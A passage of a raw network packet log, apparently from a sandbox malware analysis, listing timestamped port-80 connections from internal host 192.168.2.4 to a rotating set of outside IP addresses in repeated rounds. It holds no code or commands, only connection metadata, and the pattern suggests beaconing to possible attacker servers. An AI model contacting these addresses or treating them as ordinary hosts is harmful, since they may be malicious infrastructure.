                                                        Nov 4, 2024 10:11:25.651118994 CET8049900162.0.215.244192.168.2.4
                                                        Nov 4, 2024 10:11:25.651129961 CET8049900162.0.215.244192.168.2.4
                                                        Nov 4, 2024 10:11:25.651205063 CET8049900162.0.215.244192.168.2.4
                                                        Nov 4, 2024 10:11:25.651216030 CET8049900162.0.215.244192.168.2.4
                                                        Nov 4, 2024 10:11:25.651247025 CET8049900162.0.215.244192.168.2.4
                                                        Nov 4, 2024 10:11:26.346781969 CET8049900162.0.215.244192.168.2.4
                                                        Nov 4, 2024 10:11:26.346915960 CET8049900162.0.215.244192.168.2.4
                                                        Nov 4, 2024 10:11:26.346925974 CET8049900162.0.215.244192.168.2.4
                                                        Nov 4, 2024 10:11:26.346987963 CET4990080192.168.2.4162.0.215.244
                                                        Nov 4, 2024 10:11:26.347342968 CET8049900162.0.215.244192.168.2.4
                                                        Nov 4, 2024 10:11:26.347354889 CET8049900162.0.215.244192.168.2.4
                                                        Nov 4, 2024 10:11:26.347364902 CET8049900162.0.215.244192.168.2.4
                                                        Nov 4, 2024 10:11:26.347387075 CET4990080192.168.2.4162.0.215.244
                                                        Nov 4, 2024 10:11:26.347418070 CET4990080192.168.2.4162.0.215.244
                                                        Nov 4, 2024 10:11:26.385299921 CET8049900162.0.215.244192.168.2.4
                                                        Nov 4, 2024 10:11:26.385379076 CET4990080192.168.2.4162.0.215.244
                                                        Nov 4, 2024 10:11:27.151930094 CET4990080192.168.2.4162.0.215.244
                                                        Nov 4, 2024 10:11:28.170836926 CET4991280192.168.2.4162.0.215.244
                                                        Nov 4, 2024 10:11:28.175692081 CET8049912162.0.215.244192.168.2.4
                                                        Nov 4, 2024 10:11:28.175867081 CET4991280192.168.2.4162.0.215.244
                                                        Nov 4, 2024 10:11:28.183389902 CET4991280192.168.2.4162.0.215.244
                                                        Nov 4, 2024 10:11:28.188163042 CET8049912162.0.215.244192.168.2.4
                                                        Nov 4, 2024 10:11:28.863142014 CET8049912162.0.215.244192.168.2.4
                                                        Nov 4, 2024 10:11:28.863238096 CET8049912162.0.215.244192.168.2.4
                                                        Nov 4, 2024 10:11:28.863328934 CET8049912162.0.215.244192.168.2.4
                                                        Nov 4, 2024 10:11:28.863331079 CET4991280192.168.2.4162.0.215.244
                                                        Nov 4, 2024 10:11:28.863601923 CET8049912162.0.215.244192.168.2.4
                                                        Nov 4, 2024 10:11:28.863614082 CET8049912162.0.215.244192.168.2.4
                                                        Nov 4, 2024 10:11:28.863626003 CET8049912162.0.215.244192.168.2.4
                                                        Nov 4, 2024 10:11:28.863636971 CET4991280192.168.2.4162.0.215.244
                                                        Nov 4, 2024 10:11:28.863670111 CET4991280192.168.2.4162.0.215.244
                                                        Nov 4, 2024 10:11:28.864270926 CET8049912162.0.215.244192.168.2.4
                                                        Nov 4, 2024 10:11:28.864285946 CET8049912162.0.215.244192.168.2.4
                                                        Nov 4, 2024 10:11:28.864300966 CET8049912162.0.215.244192.168.2.4
                                                        Nov 4, 2024 10:11:28.864325047 CET4991280192.168.2.4162.0.215.244
                                                        Nov 4, 2024 10:11:28.864973068 CET8049912162.0.215.244192.168.2.4
                                                        Nov 4, 2024 10:11:28.865009069 CET4991280192.168.2.4162.0.215.244
                                                        Nov 4, 2024 10:11:28.902163982 CET8049912162.0.215.244192.168.2.4
                                                        Nov 4, 2024 10:11:28.902337074 CET4991280192.168.2.4162.0.215.244
                                                        Nov 4, 2024 10:11:28.903204918 CET4991280192.168.2.4162.0.215.244
                                                        Nov 4, 2024 10:11:28.908004999 CET8049912162.0.215.244192.168.2.4
                                                        Nov 4, 2024 10:11:33.935777903 CET4994080192.168.2.4104.21.3.144
                                                        Nov 4, 2024 10:11:33.940691948 CET8049940104.21.3.144192.168.2.4
                                                        Nov 4, 2024 10:11:33.940753937 CET4994080192.168.2.4104.21.3.144
                                                        Nov 4, 2024 10:11:33.951836109 CET4994080192.168.2.4104.21.3.144
                                                        Nov 4, 2024 10:11:33.956677914 CET8049940104.21.3.144192.168.2.4
                                                        Nov 4, 2024 10:11:35.035046101 CET8049940104.21.3.144192.168.2.4
                                                        Nov 4, 2024 10:11:35.035157919 CET8049940104.21.3.144192.168.2.4
                                                        Nov 4, 2024 10:11:35.035208941 CET4994080192.168.2.4104.21.3.144
                                                        Nov 4, 2024 10:11:35.036791086 CET8049940104.21.3.144192.168.2.4
                                                        Nov 4, 2024 10:11:35.036839008 CET4994080192.168.2.4104.21.3.144
                                                        Nov 4, 2024 10:11:35.464391947 CET4994080192.168.2.4104.21.3.144
                                                        Nov 4, 2024 10:11:36.483695030 CET4995380192.168.2.4104.21.3.144
                                                        Nov 4, 2024 10:11:36.488775015 CET8049953104.21.3.144192.168.2.4
                                                        Nov 4, 2024 10:11:36.488864899 CET4995380192.168.2.4104.21.3.144
                                                        Nov 4, 2024 10:11:36.500694036 CET4995380192.168.2.4104.21.3.144
                                                        Nov 4, 2024 10:11:36.505625010 CET8049953104.21.3.144192.168.2.4
                                                        Nov 4, 2024 10:11:37.604165077 CET8049953104.21.3.144192.168.2.4
                                                        Nov 4, 2024 10:11:37.604201078 CET8049953104.21.3.144192.168.2.4
                                                        Nov 4, 2024 10:11:37.604279995 CET4995380192.168.2.4104.21.3.144
                                                        Nov 4, 2024 10:11:37.605921030 CET8049953104.21.3.144192.168.2.4
                                                        Nov 4, 2024 10:11:37.605982065 CET4995380192.168.2.4104.21.3.144
                                                        Nov 4, 2024 10:11:38.011401892 CET4995380192.168.2.4104.21.3.144
                                                        Nov 4, 2024 10:11:39.030284882 CET4996580192.168.2.4104.21.3.144
                                                        Nov 4, 2024 10:11:39.035208941 CET8049965104.21.3.144192.168.2.4
                                                        Nov 4, 2024 10:11:39.036569118 CET4996580192.168.2.4104.21.3.144
                                                        Nov 4, 2024 10:11:39.048511982 CET4996580192.168.2.4104.21.3.144
                                                        Nov 4, 2024 10:11:39.053487062 CET8049965104.21.3.144192.168.2.4
                                                        Nov 4, 2024 10:11:39.053601027 CET8049965104.21.3.144192.168.2.4
                                                        Nov 4, 2024 10:11:39.053610086 CET8049965104.21.3.144192.168.2.4
                                                        Nov 4, 2024 10:11:39.053613901 CET8049965104.21.3.144192.168.2.4
                                                        Nov 4, 2024 10:11:39.053625107 CET8049965104.21.3.144192.168.2.4
                                                        Nov 4, 2024 10:11:39.053633928 CET8049965104.21.3.144192.168.2.4
                                                        Nov 4, 2024 10:11:39.053642988 CET8049965104.21.3.144192.168.2.4
                                                        Nov 4, 2024 10:11:39.053654909 CET8049965104.21.3.144192.168.2.4
                                                        Nov 4, 2024 10:11:39.053673029 CET8049965104.21.3.144192.168.2.4
                                                        Nov 4, 2024 10:11:40.092001915 CET8049965104.21.3.144192.168.2.4
                                                        Nov 4, 2024 10:11:40.092114925 CET8049965104.21.3.144192.168.2.4
                                                        Nov 4, 2024 10:11:40.092125893 CET8049965104.21.3.144192.168.2.4
                                                        Nov 4, 2024 10:11:40.092180967 CET4996580192.168.2.4104.21.3.144
                                                        Nov 4, 2024 10:11:40.094352961 CET8049965104.21.3.144192.168.2.4
                                                        Nov 4, 2024 10:11:40.094404936 CET4996580192.168.2.4104.21.3.144
                                                        Nov 4, 2024 10:11:40.558196068 CET4996580192.168.2.4104.21.3.144
                                                        Nov 4, 2024 10:11:41.585994005 CET4997880192.168.2.4104.21.3.144
                                                        Nov 4, 2024 10:11:41.594625950 CET8049978104.21.3.144192.168.2.4
                                                        Nov 4, 2024 10:11:41.594701052 CET4997880192.168.2.4104.21.3.144
                                                        Nov 4, 2024 10:11:41.607145071 CET4997880192.168.2.4104.21.3.144
                                                        Nov 4, 2024 10:11:41.629034042 CET8049978104.21.3.144192.168.2.4
                                                        Nov 4, 2024 10:11:42.714726925 CET8049978104.21.3.144192.168.2.4
                                                        Nov 4, 2024 10:11:42.714816093 CET8049978104.21.3.144192.168.2.4
                                                        Nov 4, 2024 10:11:42.714914083 CET4997880192.168.2.4104.21.3.144
                                                        Nov 4, 2024 10:11:42.716370106 CET8049978104.21.3.144192.168.2.4
                                                        Nov 4, 2024 10:11:42.716420889 CET4997880192.168.2.4104.21.3.144
                                                        Nov 4, 2024 10:11:42.717551947 CET4997880192.168.2.4104.21.3.144
                                                        Nov 4, 2024 10:11:42.722371101 CET8049978104.21.3.144192.168.2.4
                                                        Nov 4, 2024 10:11:47.760242939 CET5000880192.168.2.476.223.67.189
                                                        Nov 4, 2024 10:11:47.765216112 CET805000876.223.67.189192.168.2.4
                                                        Nov 4, 2024 10:11:47.765295982 CET5000880192.168.2.476.223.67.189
                                                        Nov 4, 2024 10:11:47.778816938 CET5000880192.168.2.476.223.67.189
                                                        Nov 4, 2024 10:11:47.783658028 CET805000876.223.67.189192.168.2.4
                                                        Nov 4, 2024 10:11:49.292598963 CET5000880192.168.2.476.223.67.189
                                                        Nov 4, 2024 10:11:49.297919989 CET805000876.223.67.189192.168.2.4
                                                        Nov 4, 2024 10:11:49.298150063 CET5000880192.168.2.476.223.67.189
                                                        Nov 4, 2024 10:11:50.341156960 CET5001680192.168.2.476.223.67.189
                                                        Nov 4, 2024 10:11:50.346281052 CET805001676.223.67.189192.168.2.4
                                                        Nov 4, 2024 10:11:50.346353054 CET5001680192.168.2.476.223.67.189
                                                        Nov 4, 2024 10:11:50.496211052 CET5001680192.168.2.476.223.67.189
                                                        Nov 4, 2024 10:11:50.501029968 CET805001676.223.67.189192.168.2.4
                                                        Nov 4, 2024 10:11:50.971041918 CET805001676.223.67.189192.168.2.4
                                                        Nov 4, 2024 10:11:50.971333981 CET5001680192.168.2.476.223.67.189
                                                        Nov 4, 2024 10:11:52.011357069 CET5001680192.168.2.476.223.67.189
                                                        Nov 4, 2024 10:11:52.016645908 CET805001676.223.67.189192.168.2.4
                                                        Nov 4, 2024 10:11:53.045140982 CET5001780192.168.2.476.223.67.189
                                                        Nov 4, 2024 10:11:53.051217079 CET805001776.223.67.189192.168.2.4
                                                        Nov 4, 2024 10:11:53.051414013 CET5001780192.168.2.476.223.67.189
                                                        Nov 4, 2024 10:11:53.069380045 CET5001780192.168.2.476.223.67.189
                                                        Nov 4, 2024 10:11:53.074259996 CET805001776.223.67.189192.168.2.4
                                                        Nov 4, 2024 10:11:53.074265957 CET805001776.223.67.189192.168.2.4
                                                        Nov 4, 2024 10:11:53.074285030 CET805001776.223.67.189192.168.2.4
                                                        Nov 4, 2024 10:11:53.074301004 CET805001776.223.67.189192.168.2.4
                                                        Nov 4, 2024 10:11:53.074316025 CET805001776.223.67.189192.168.2.4
                                                        Nov 4, 2024 10:11:53.074326992 CET805001776.223.67.189192.168.2.4
                                                        Nov 4, 2024 10:11:53.074333906 CET805001776.223.67.189192.168.2.4
                                                        Nov 4, 2024 10:11:53.074455023 CET805001776.223.67.189192.168.2.4
                                                        Nov 4, 2024 10:11:53.074459076 CET805001776.223.67.189192.168.2.4
                                                        Nov 4, 2024 10:11:54.574029922 CET5001780192.168.2.476.223.67.189
                                                        Nov 4, 2024 10:11:54.579346895 CET805001776.223.67.189192.168.2.4
                                                        Nov 4, 2024 10:11:54.579399109 CET5001780192.168.2.476.223.67.189
                                                        Nov 4, 2024 10:11:55.597533941 CET5001880192.168.2.476.223.67.189
                                                        Nov 4, 2024 10:11:55.602404118 CET805001876.223.67.189192.168.2.4
                                                        Nov 4, 2024 10:11:55.603682041 CET5001880192.168.2.476.223.67.189
                                                        Nov 4, 2024 10:11:55.611392975 CET5001880192.168.2.476.223.67.189
                                                        Nov 4, 2024 10:11:55.632282972 CET805001876.223.67.189192.168.2.4
                                                        Nov 4, 2024 10:11:56.260510921 CET805001876.223.67.189192.168.2.4
                                                        Nov 4, 2024 10:11:56.260937929 CET805001876.223.67.189192.168.2.4
                                                        Nov 4, 2024 10:11:56.260992050 CET5001880192.168.2.476.223.67.189
                                                        Nov 4, 2024 10:11:56.263732910 CET5001880192.168.2.476.223.67.189
                                                        Nov 4, 2024 10:11:56.268630981 CET805001876.223.67.189192.168.2.4
                                                        Nov 4, 2024 10:12:01.298105001 CET5001980192.168.2.43.33.130.190
                                                        Nov 4, 2024 10:12:01.302891970 CET80500193.33.130.190192.168.2.4
                                                        Nov 4, 2024 10:12:01.303956985 CET5001980192.168.2.43.33.130.190
                                                        Nov 4, 2024 10:12:01.315690041 CET5001980192.168.2.43.33.130.190
                                                        Nov 4, 2024 10:12:01.320605040 CET80500193.33.130.190192.168.2.4
                                                        Nov 4, 2024 10:12:02.827580929 CET5001980192.168.2.43.33.130.190
                                                        Nov 4, 2024 10:12:02.832890987 CET80500193.33.130.190192.168.2.4
                                                        Nov 4, 2024 10:12:02.833017111 CET5001980192.168.2.43.33.130.190
                                                        Nov 4, 2024 10:12:03.843548059 CET5002080192.168.2.43.33.130.190
                                                        Nov 4, 2024 10:12:03.848350048 CET80500203.33.130.190192.168.2.4
                                                        Nov 4, 2024 10:12:03.848417997 CET5002080192.168.2.43.33.130.190
                                                        Nov 4, 2024 10:12:03.863682985 CET5002080192.168.2.43.33.130.190
                                                        Nov 4, 2024 10:12:03.868555069 CET80500203.33.130.190192.168.2.4
                                                        Nov 4, 2024 10:12:05.370920897 CET5002080192.168.2.43.33.130.190
                                                        Nov 4, 2024 10:12:05.376157999 CET80500203.33.130.190192.168.2.4
                                                        Nov 4, 2024 10:12:05.376233101 CET5002080192.168.2.43.33.130.190
                                                        Nov 4, 2024 10:12:06.394540071 CET5002180192.168.2.43.33.130.190
                                                        Nov 4, 2024 10:12:06.399353027 CET80500213.33.130.190192.168.2.4
                                                        Nov 4, 2024 10:12:06.399456978 CET5002180192.168.2.43.33.130.190
                                                        Nov 4, 2024 10:12:06.411699057 CET5002180192.168.2.43.33.130.190
                                                        Nov 4, 2024 10:12:06.416631937 CET80500213.33.130.190192.168.2.4
                                                        Nov 4, 2024 10:12:06.416637897 CET80500213.33.130.190192.168.2.4
                                                        Nov 4, 2024 10:12:06.416660070 CET80500213.33.130.190192.168.2.4
                                                        Nov 4, 2024 10:12:06.416663885 CET80500213.33.130.190192.168.2.4
                                                        Nov 4, 2024 10:12:06.416698933 CET80500213.33.130.190192.168.2.4
                                                        Nov 4, 2024 10:12:06.416703939 CET80500213.33.130.190192.168.2.4
                                                        Nov 4, 2024 10:12:06.416757107 CET80500213.33.130.190192.168.2.4
                                                        Nov 4, 2024 10:12:06.416760921 CET80500213.33.130.190192.168.2.4
                                                        Nov 4, 2024 10:12:06.416790962 CET80500213.33.130.190192.168.2.4
                                                        Nov 4, 2024 10:12:07.920944929 CET5002180192.168.2.43.33.130.190
                                                        Nov 4, 2024 10:12:07.926251888 CET80500213.33.130.190192.168.2.4
                                                        Nov 4, 2024 10:12:07.926299095 CET5002180192.168.2.43.33.130.190
                                                        Nov 4, 2024 10:12:08.936474085 CET5002280192.168.2.43.33.130.190
                                                        Nov 4, 2024 10:12:08.941555023 CET80500223.33.130.190192.168.2.4
                                                        Nov 4, 2024 10:12:08.945677042 CET5002280192.168.2.43.33.130.190
                                                        Nov 4, 2024 10:12:08.952990055 CET5002280192.168.2.43.33.130.190
                                                        Nov 4, 2024 10:12:08.957860947 CET80500223.33.130.190192.168.2.4
                                                        Nov 4, 2024 10:12:10.520934105 CET80500223.33.130.190192.168.2.4
                                                        Nov 4, 2024 10:12:10.521541119 CET80500223.33.130.190192.168.2.4
                                                        Nov 4, 2024 10:12:10.521608114 CET5002280192.168.2.43.33.130.190
                                                        Nov 4, 2024 10:12:10.542274952 CET5002280192.168.2.43.33.130.190
                                                        Nov 4, 2024 10:12:10.547292948 CET80500223.33.130.190192.168.2.4
                                                        Nov 4, 2024 10:12:15.597986937 CET5002380192.168.2.484.32.84.32
                                                        Nov 4, 2024 10:12:15.602866888 CET805002384.32.84.32192.168.2.4
                                                        Nov 4, 2024 10:12:15.605633974 CET5002380192.168.2.484.32.84.32
                                                        Nov 4, 2024 10:12:15.617593050 CET5002380192.168.2.484.32.84.32
                                                        Nov 4, 2024 10:12:15.622538090 CET805002384.32.84.32192.168.2.4
                                                        Nov 4, 2024 10:12:16.425811052 CET805002384.32.84.32192.168.2.4
                                                        Nov 4, 2024 10:12:16.425875902 CET5002380192.168.2.484.32.84.32
                                                        Nov 4, 2024 10:12:17.123553991 CET5002380192.168.2.484.32.84.32
                                                        Nov 4, 2024 10:12:17.128442049 CET805002384.32.84.32192.168.2.4
                                                        Nov 4, 2024 10:12:18.140095949 CET5002480192.168.2.484.32.84.32
                                                        Nov 4, 2024 10:12:18.145124912 CET805002484.32.84.32192.168.2.4
                                                        Nov 4, 2024 10:12:18.145195961 CET5002480192.168.2.484.32.84.32
                                                        Nov 4, 2024 10:12:18.158333063 CET5002480192.168.2.484.32.84.32
                                                        Nov 4, 2024 10:12:18.163235903 CET805002484.32.84.32192.168.2.4
                                                        Nov 4, 2024 10:12:18.966130972 CET805002484.32.84.32192.168.2.4
                                                        Nov 4, 2024 10:12:18.969660044 CET5002480192.168.2.484.32.84.32
                                                        Nov 4, 2024 10:12:19.667753935 CET5002480192.168.2.484.32.84.32
                                                        Nov 4, 2024 10:12:19.672627926 CET805002484.32.84.32192.168.2.4
                                                        Nov 4, 2024 10:12:20.686837912 CET5002580192.168.2.484.32.84.32
                                                        Nov 4, 2024 10:12:20.691951036 CET805002584.32.84.32192.168.2.4
                                                        Nov 4, 2024 10:12:20.692033052 CET5002580192.168.2.484.32.84.32
                                                        Nov 4, 2024 10:12:20.704643965 CET5002580192.168.2.484.32.84.32
                                                        Nov 4, 2024 10:12:20.709695101 CET805002584.32.84.32192.168.2.4
                                                        Nov 4, 2024 10:12:20.709734917 CET805002584.32.84.32192.168.2.4
                                                        Nov 4, 2024 10:12:20.709738970 CET805002584.32.84.32192.168.2.4
                                                        Nov 4, 2024 10:12:20.710407019 CET805002584.32.84.32192.168.2.4
                                                        Nov 4, 2024 10:12:20.710412025 CET805002584.32.84.32192.168.2.4
                                                        Nov 4, 2024 10:12:20.710422039 CET805002584.32.84.32192.168.2.4
                                                        Nov 4, 2024 10:12:20.710424900 CET805002584.32.84.32192.168.2.4
                                                        Nov 4, 2024 10:12:20.710433960 CET805002584.32.84.32192.168.2.4
                                                        Nov 4, 2024 10:12:20.710438013 CET805002584.32.84.32192.168.2.4
                                                        Nov 4, 2024 10:12:21.498322964 CET805002584.32.84.32192.168.2.4
                                                        Nov 4, 2024 10:12:21.498423100 CET5002580192.168.2.484.32.84.32
                                                        Nov 4, 2024 10:12:22.217689991 CET5002580192.168.2.484.32.84.32
                                                        Nov 4, 2024 10:12:22.222579002 CET805002584.32.84.32192.168.2.4
                                                        Nov 4, 2024 10:12:23.235872984 CET5002680192.168.2.484.32.84.32
                                                        Nov 4, 2024 10:12:23.240921974 CET805002684.32.84.32192.168.2.4
                                                        Nov 4, 2024 10:12:23.241012096 CET5002680192.168.2.484.32.84.32
                                                        Nov 4, 2024 10:12:23.251815081 CET5002680192.168.2.484.32.84.32
                                                        Nov 4, 2024 10:12:23.509701014 CET805002684.32.84.32192.168.2.4
                                                        Nov 4, 2024 10:12:24.065368891 CET805002684.32.84.32192.168.2.4
                                                        Nov 4, 2024 10:12:24.065390110 CET805002684.32.84.32192.168.2.4
                                                        Nov 4, 2024 10:12:24.065401077 CET805002684.32.84.32192.168.2.4
                                                        Nov 4, 2024 10:12:24.065412045 CET805002684.32.84.32192.168.2.4
                                                        Nov 4, 2024 10:12:24.065432072 CET805002684.32.84.32192.168.2.4
                                                        Nov 4, 2024 10:12:24.065442085 CET805002684.32.84.32192.168.2.4
                                                        Nov 4, 2024 10:12:24.065459967 CET805002684.32.84.32192.168.2.4
                                                        Nov 4, 2024 10:12:24.065522909 CET5002680192.168.2.484.32.84.32
                                                        Nov 4, 2024 10:12:24.065557003 CET5002680192.168.2.484.32.84.32
                                                        Nov 4, 2024 10:12:24.065623999 CET805002684.32.84.32192.168.2.4
                                                        Nov 4, 2024 10:12:24.065634966 CET805002684.32.84.32192.168.2.4
                                                        Nov 4, 2024 10:12:24.065655947 CET805002684.32.84.32192.168.2.4
                                                        Nov 4, 2024 10:12:24.065660954 CET5002680192.168.2.484.32.84.32
                                                        Nov 4, 2024 10:12:24.065697908 CET5002680192.168.2.484.32.84.32
                                                        Nov 4, 2024 10:12:24.070408106 CET805002684.32.84.32192.168.2.4
                                                        Nov 4, 2024 10:12:24.120718002 CET5002680192.168.2.484.32.84.32
                                                        Nov 4, 2024 10:12:24.177874088 CET805002684.32.84.32192.168.2.4
                                                        Nov 4, 2024 10:12:24.177997112 CET5002680192.168.2.484.32.84.32
                                                        Nov 4, 2024 10:12:24.179819107 CET5002680192.168.2.484.32.84.32
                                                        Nov 4, 2024 10:12:24.185534954 CET805002684.32.84.32192.168.2.4
                                                        Nov 4, 2024 10:12:29.207210064 CET5002780192.168.2.4162.0.231.203
                                                        Nov 4, 2024 10:12:29.212212086 CET8050027162.0.231.203192.168.2.4
                                                        Nov 4, 2024 10:12:29.216190100 CET5002780192.168.2.4162.0.231.203
                                                        Nov 4, 2024 10:12:29.227746964 CET5002780192.168.2.4162.0.231.203
                                                        Nov 4, 2024 10:12:29.232641935 CET8050027162.0.231.203192.168.2.4
                                                        Nov 4, 2024 10:12:29.937017918 CET8050027162.0.231.203192.168.2.4
                                                        Nov 4, 2024 10:12:29.975132942 CET8050027162.0.231.203192.168.2.4
                                                        Nov 4, 2024 10:12:29.975186110 CET5002780192.168.2.4162.0.231.203
                                                        Nov 4, 2024 10:12:30.731621981 CET5002780192.168.2.4162.0.231.203
                                                        Nov 4, 2024 10:12:31.750062943 CET5002880192.168.2.4162.0.231.203
                                                        Nov 4, 2024 10:12:31.755156040 CET8050028162.0.231.203192.168.2.4
                                                        Nov 4, 2024 10:12:31.755223989 CET5002880192.168.2.4162.0.231.203
                                                        Nov 4, 2024 10:12:31.770297050 CET5002880192.168.2.4162.0.231.203
                                                        Nov 4, 2024 10:12:31.775321007 CET8050028162.0.231.203192.168.2.4
                                                        Nov 4, 2024 10:12:33.277137041 CET5002880192.168.2.4162.0.231.203
                                                        Nov 4, 2024 10:12:33.282630920 CET8050028162.0.231.203192.168.2.4
                                                        Nov 4, 2024 10:12:33.285736084 CET5002880192.168.2.4162.0.231.203
                                                        Nov 4, 2024 10:12:34.296379089 CET5002980192.168.2.4162.0.231.203
                                                        Nov 4, 2024 10:12:34.301287889 CET8050029162.0.231.203192.168.2.4
                                                        Nov 4, 2024 10:12:34.301352978 CET5002980192.168.2.4162.0.231.203
                                                        Nov 4, 2024 10:12:34.316119909 CET5002980192.168.2.4162.0.231.203
                                                        Nov 4, 2024 10:12:34.321126938 CET8050029162.0.231.203192.168.2.4
                                                        Nov 4, 2024 10:12:34.321177006 CET8050029162.0.231.203192.168.2.4
                                                        Nov 4, 2024 10:12:34.321182013 CET8050029162.0.231.203192.168.2.4
                                                        Nov 4, 2024 10:12:34.321192026 CET8050029162.0.231.203192.168.2.4
                                                        Nov 4, 2024 10:12:34.321209908 CET8050029162.0.231.203192.168.2.4
                                                        Nov 4, 2024 10:12:34.321213961 CET8050029162.0.231.203192.168.2.4
                                                        Nov 4, 2024 10:12:34.321278095 CET8050029162.0.231.203192.168.2.4
                                                        Nov 4, 2024 10:12:34.321281910 CET8050029162.0.231.203192.168.2.4
                                                        Nov 4, 2024 10:12:34.321324110 CET8050029162.0.231.203192.168.2.4
                                                        Nov 4, 2024 10:12:34.993571997 CET8050029162.0.231.203192.168.2.4
                                                        Nov 4, 2024 10:12:35.031306982 CET8050029162.0.231.203192.168.2.4
                                                        Nov 4, 2024 10:12:35.032476902 CET5002980192.168.2.4162.0.231.203
                                                        Nov 4, 2024 10:12:35.824177027 CET5002980192.168.2.4162.0.231.203
                                                        Nov 4, 2024 10:12:36.843734026 CET5003080192.168.2.4162.0.231.203
                                                        Nov 4, 2024 10:12:36.848526955 CET8050030162.0.231.203192.168.2.4
                                                        Nov 4, 2024 10:12:36.855943918 CET5003080192.168.2.4162.0.231.203
                                                        Nov 4, 2024 10:12:36.863676071 CET5003080192.168.2.4162.0.231.203
                                                        Nov 4, 2024 10:12:36.868829012 CET8050030162.0.231.203192.168.2.4
                                                        Nov 4, 2024 10:12:37.548274994 CET8050030162.0.231.203192.168.2.4
                                                        Nov 4, 2024 10:12:37.586769104 CET8050030162.0.231.203192.168.2.4
                                                        Nov 4, 2024 10:12:37.587933064 CET5003080192.168.2.4162.0.231.203
                                                        Nov 4, 2024 10:12:37.591609001 CET5003080192.168.2.4162.0.231.203
                                                        Nov 4, 2024 10:12:37.596465111 CET8050030162.0.231.203192.168.2.4
                                                        Nov 4, 2024 10:12:43.075297117 CET5003180192.168.2.4150.95.254.16
                                                        Nov 4, 2024 10:12:43.080465078 CET8050031150.95.254.16192.168.2.4
                                                        Nov 4, 2024 10:12:43.080708027 CET5003180192.168.2.4150.95.254.16
                                                        Nov 4, 2024 10:12:43.092669964 CET5003180192.168.2.4150.95.254.16
                                                        Nov 4, 2024 10:12:43.098714113 CET8050031150.95.254.16192.168.2.4
                                                        Nov 4, 2024 10:12:43.965040922 CET8050031150.95.254.16192.168.2.4
                                                        Nov 4, 2024 10:12:43.965118885 CET8050031150.95.254.16192.168.2.4
                                                        Nov 4, 2024 10:12:43.965128899 CET8050031150.95.254.16192.168.2.4
                                                        Nov 4, 2024 10:12:43.965166092 CET5003180192.168.2.4150.95.254.16
                                                        Nov 4, 2024 10:12:44.011420965 CET5003180192.168.2.4150.95.254.16
                                                        Nov 4, 2024 10:12:44.110845089 CET8050031150.95.254.16192.168.2.4
                                                        Nov 4, 2024 10:12:44.110897064 CET5003180192.168.2.4150.95.254.16
                                                        Nov 4, 2024 10:12:44.605267048 CET5003180192.168.2.4150.95.254.16
                                                        Nov 4, 2024 10:12:45.627862930 CET5003280192.168.2.4150.95.254.16
                                                        Nov 4, 2024 10:12:45.633378983 CET8050032150.95.254.16192.168.2.4
                                                        Nov 4, 2024 10:12:45.635782003 CET5003280192.168.2.4150.95.254.16
                                                        Nov 4, 2024 10:12:45.647862911 CET5003280192.168.2.4150.95.254.16
                                                        Nov 4, 2024 10:12:45.653712988 CET8050032150.95.254.16192.168.2.4
                                                        Nov 4, 2024 10:12:46.548057079 CET8050032150.95.254.16192.168.2.4
                                                        Nov 4, 2024 10:12:46.548064947 CET8050032150.95.254.16192.168.2.4
                                                        Nov 4, 2024 10:12:46.548134089 CET5003280192.168.2.4150.95.254.16
                                                        Nov 4, 2024 10:12:46.685547113 CET8050032150.95.254.16192.168.2.4
                                                        Nov 4, 2024 10:12:46.685600996 CET5003280192.168.2.4150.95.254.16
                                                        Nov 4, 2024 10:12:47.152118921 CET5003280192.168.2.4150.95.254.16
                                                        Nov 4, 2024 10:12:48.171715021 CET5003380192.168.2.4150.95.254.16
                                                        Nov 4, 2024 10:12:48.176731110 CET8050033150.95.254.16192.168.2.4
                                                        Nov 4, 2024 10:12:48.176794052 CET5003380192.168.2.4150.95.254.16
                                                        Nov 4, 2024 10:12:48.190875053 CET5003380192.168.2.4150.95.254.16
                                                        Nov 4, 2024 10:12:48.195779085 CET8050033150.95.254.16192.168.2.4
                                                        Nov 4, 2024 10:12:48.195797920 CET8050033150.95.254.16192.168.2.4
                                                        Nov 4, 2024 10:12:48.195806980 CET8050033150.95.254.16192.168.2.4
                                                        Nov 4, 2024 10:12:48.195825100 CET8050033150.95.254.16192.168.2.4
                                                        Nov 4, 2024 10:12:48.195833921 CET8050033150.95.254.16192.168.2.4
                                                        Nov 4, 2024 10:12:48.195852995 CET8050033150.95.254.16192.168.2.4
                                                        Nov 4, 2024 10:12:48.195863962 CET8050033150.95.254.16192.168.2.4
                                                        Nov 4, 2024 10:12:48.195983887 CET8050033150.95.254.16192.168.2.4
                                                        Nov 4, 2024 10:12:48.196027040 CET8050033150.95.254.16192.168.2.4
                                                        Nov 4, 2024 10:12:49.047112942 CET8050033150.95.254.16192.168.2.4
                                                        Nov 4, 2024 10:12:49.047303915 CET8050033150.95.254.16192.168.2.4
                                                        Nov 4, 2024 10:12:49.047308922 CET8050033150.95.254.16192.168.2.4
                                                        Nov 4, 2024 10:12:49.047482967 CET5003380192.168.2.4150.95.254.16
                                                        Nov 4, 2024 10:12:49.189408064 CET8050033150.95.254.16192.168.2.4
                                                        Nov 4, 2024 10:12:49.189546108 CET5003380192.168.2.4150.95.254.16
                                                        Nov 4, 2024 10:12:49.699064970 CET5003380192.168.2.4150.95.254.16
                                                        Nov 4, 2024 10:12:50.718262911 CET5003480192.168.2.4150.95.254.16
                                                        Nov 4, 2024 10:12:50.723167896 CET8050034150.95.254.16192.168.2.4
                                                        Nov 4, 2024 10:12:50.723237991 CET5003480192.168.2.4150.95.254.16
                                                        Nov 4, 2024 10:12:50.732224941 CET5003480192.168.2.4150.95.254.16
                                                        Nov 4, 2024 10:12:50.737174034 CET8050034150.95.254.16192.168.2.4
                                                        Nov 4, 2024 10:12:51.582786083 CET8050034150.95.254.16192.168.2.4
                                                        Nov 4, 2024 10:12:51.582798958 CET8050034150.95.254.16192.168.2.4
                                                        Nov 4, 2024 10:12:51.585839033 CET5003480192.168.2.4150.95.254.16
                                                        Nov 4, 2024 10:12:51.719789028 CET8050034150.95.254.16192.168.2.4
                                                        Nov 4, 2024 10:12:51.720801115 CET5003480192.168.2.4150.95.254.16
                                                        Nov 4, 2024 10:12:51.723671913 CET5003480192.168.2.4150.95.254.16
                                                        Nov 4, 2024 10:12:51.737556934 CET8050034150.95.254.16192.168.2.4
                                                        Nov 4, 2024 10:12:56.771519899 CET5003580192.168.2.43.33.130.190
                                                        Nov 4, 2024 10:12:56.776418924 CET80500353.33.130.190192.168.2.4
                                                        Nov 4, 2024 10:12:56.776496887 CET5003580192.168.2.43.33.130.190
                                                        Nov 4, 2024 10:12:56.792522907 CET5003580192.168.2.43.33.130.190
